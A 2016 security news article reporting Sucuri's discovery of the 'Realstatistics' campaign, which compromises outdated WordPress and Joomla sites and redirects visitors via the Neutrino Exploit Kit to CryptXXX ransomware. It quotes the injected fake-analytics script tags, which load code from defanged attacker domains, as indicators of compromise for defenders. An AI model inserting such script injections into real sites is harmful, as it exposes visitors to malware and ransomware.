Realstatistics campaign leads to ransomware via compromised sites

Pierluigi Paganini July 10, 2016

Threat actors in the wild are behind the Realstatistics campaign are leveraging on out-of-date CMSs to deliver the CryptXXX ransomware.

Security experts from Sucuri security firm have spotted a new ransomware-based campaign dubbed ‘Realstatistics’ conducted by threat actors in the past two weeks.

“Our Incident Response Team (IRT) has been tracking a mass infection campaign over the last two weeks ( codenamed “Realstatistics“). This campaign has compromised thousands of websites built on the Joomla! and WordPress Content Management System (CMS).” states Sucuri in a blog post. “We have codenamed the campaign “Realstatistics” because of the domain being used by the attackers”

Experts estimated that over 2,000 websites running out-of-date CMSs have been already infected, and at least 100 new websites are infected every day.

Sucuri Realstatistics Campaign 650x286

The vast majority of the infected websites (90 percent) is running an older version of CMS platforms, 60% of them is based on WordPress and Joomla.

The experts discovered that threat actors are injecting the following fake analytics code into the PHP template of every compromised site:

<script language="JavaScript"

src="http://realstatistics[.]info[/]js/analytic.php?id=4"

<script language="JavaScript"

src="http://realstatistics[.]pro[/]js/analytic.php?id=4"

The analysis of compromised websites revealed that threat actors behind the Realstatistics campaign are most likely exploiting vulnerabilities in plugins to hack them.

The domain realstatistics[.]info was the first spotted in the wild around June 9th, later on Jul 1st attackers switched on realstatistics[.]pro. Both domains are still being used by the attackers.

The researchers noticed that the malicious campaign redirects visitors to websites hosting the Neutrino Exploit Kit used to deliver the CryptXXX ransomware. Traffic hijacking is obtained by injecting a malicious JS script loaded from these two domains.

If you want to check if your website is infected use the Sucuri SiteCheck, or simply look for the fake analytics code reported above.

[adrotate banner=”9″]

Pierluigi Paganini

(Security Affairs – Realstatistics campaign, ransomware)



you might also like

leave a comment